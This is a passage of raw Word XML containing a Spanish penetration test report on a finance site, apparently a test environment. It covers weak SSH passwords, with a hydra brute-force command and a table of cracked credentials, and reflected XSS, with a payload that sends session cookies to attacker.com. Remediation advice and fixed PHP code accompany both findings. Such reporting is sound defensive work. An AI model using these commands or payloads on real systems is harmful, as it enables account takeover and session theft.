              <w:t xml:space="preserve"> Múltiples</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4507512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CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="007C3554">
              <w:t>7.8 (ALTA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44C19B2A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26A6B1B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579BC446" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t>Mediante ataque de fuerza bruta con diccionario común,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DC586A0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C3554">
              <w:t xml:space="preserve">se comprometieron múltiples cuentas de usuario en </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DCA6FC1" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C3554" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C3554">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>menos de 10 minutos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2E31D5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293A6F74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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41D27C06" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42ECC593" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  ssh://192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1064789D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7973DB33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Credenciales comprometidas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CAD2E42" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>┌──────────┬──────────────┬────────────────┐</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AD48832" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Usuario  </w:t>
            </w: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Contraseña   </w:t>
            </w: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Tiempo         </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5679C77F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>├──────────┼──────────────┼────────────────┤</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E72B1B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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jperez   </w:t>
            </w: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Password123  </w:t>
            </w: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2 minutos      </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776D67B9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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mlopez   </w:t>
            </w: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123456       </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 30 segundos    </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3117E6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> admin    </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> admin        </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5 segundos     </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="656E9769" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> soporte  </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Soporte2024  </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5 minutos      </w:t>
            </w:r>
            <w:r w:rsidRPr="00104C2E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>│</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB39493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└──────────┴──────────────┴────────────────┘</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A57A7CA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7FCCC8CB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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4020D5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>- Acceso no autorizado a 4 cuentas de empleados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D388CC8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>- Posible acceso a información confidencial</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D7DA2CE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>- Base para ataques de ingeniería social</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DBA3FD" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>- Riesgo de movimiento lateral en la red</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="102ECACC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E26BC30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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0E7399" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>1. Implementar política de contraseñas robusta:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48759FA8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t xml:space="preserve">   - Mínimo 12 caracteres</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="637AB929" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t xml:space="preserve">   - Combinación de mayúsculas, minúsculas, números y símbolos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761E3E85" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t xml:space="preserve">   - Sin palabras del diccionario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0151725A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t xml:space="preserve">   - Sin datos personales (nombres, fechas)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9C87E4" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>2. Implementar autenticación multifactor (MFA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C15FB37" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>3. Forzar cambio de contraseña cada 90 días</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4253339A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>4. Bloquear cuenta tras 5 intentos fallidos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CEF6923" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00104C2E" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00104C2E">
              <w:t>5. Usar gestor de contraseñas corporativo (LastPass, 1Password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A118C3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A3FE1C1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Política recomendada:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FC49F0C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>minlen=12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15168BD1" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>dcredit=-1  # Al menos 1 dígito</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CFE9F74" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>ucredit=-1  # Al menos 1 mayúscula</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F37E667" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>lcredit=-1  # Al menos 1 minúscula</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E8EDF46" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>ocredit=-1  # Al menos 1 símbolo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1862F6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494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7424F33C" w14:textId="77777777" w:rsidR="007A3016" w:rsidRDefault="007A3016" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AF9E4D0" w14:textId="77777777" w:rsidR="007A3016" w:rsidRDefault="007A3016" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F7BFB66" w14:textId="77777777" w:rsidR="007A3016" w:rsidRPr="007C4494" w:rsidRDefault="007A3016" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37FB595E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40A03E8B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A3016">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="007A3016">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #7:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007A3016">
              <w:t>Cross-Site Scripting (XSS) Reflejado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E8C3AB4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━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B4EDEC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ubicación: </w:t>
            </w:r>
            <w:r w:rsidRPr="007A3016">
              <w:t>test.finanzasegura.com/search.php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C184B1A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="007A3016">
              <w:t>7.1 (ALTA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B061283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3012559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4E02A79D" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>El parámetro "q" en la búsqueda no sanitiza la entrada,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E51B88" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>permitiendo inyección de código JavaScript malicioso.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5E270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D0BB2E5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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74DAF15A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>URL vulnerable:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E69F4C5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D4D78">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>test.finanzasegura.com/search.php?q=&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DFF2C6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="006D4D78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57715B2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Payload exitoso:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C32DCE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C0FF9F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t xml:space="preserve">  document.location='http://attacker.com/steal.php?cookie='+document.cookie</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1B2AAF" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007A3016" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007A3016">
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C41770E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6813B1C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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C59802" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>- Robo de cookies de sesión</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556561B6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>- Secuestro de cuentas de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D626CEB" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>- Phishing dirigido</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F93921" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>- Modificación del contenido de la página</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1184F2" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>- Keylogging en el navegador</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A262F93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5FBF763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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4E7AC4" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>1. Sanitizar todas las entradas de usuario</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C876F6" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD04A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Implementar Content Security Policy (CSP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C889954" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>3. Usar funciones de escape apropiadas</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6EFCD0" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>4. Validar entrada con lista blanca</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE5947A" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>5. Marcar cookies como HttpOnly y Secure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457DC8CA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58CB744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Código vulnerable:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025F62EE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2062F2EB" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>echo "Resultados para: " . $_GET['q'];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F0DEC88" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2437C8A4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B190E01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Código correcto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3AE858" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF069B5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00DD04A7">
              <w:t>echo "Resultados para: " . htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B143A9F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD04A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22198E9A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49805D32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Header CSP recomendado:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C842A4B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00DD04A7" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD04A7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Content-Security-Policy: default-src 'self'; script-src 'self'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="555764FF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14CA7E1B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rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375481C3" w14:textId="77777777" w:rsidR="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="777CE6A5" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="313BF0E2" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="613709DF" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05DB22C7" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07040B71" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FD1D77C" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59C207D3" w14:textId="77777777" w:rsidR="00073C53" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09908B2F" w14:textId="77777777" w:rsidR="00073C53" w:rsidRPr="007C4494" w:rsidRDefault="00073C53" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4002F945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073C53">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>⚠</w:t>
            </w:r>
            <w:r w:rsidRPr="00073C53">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
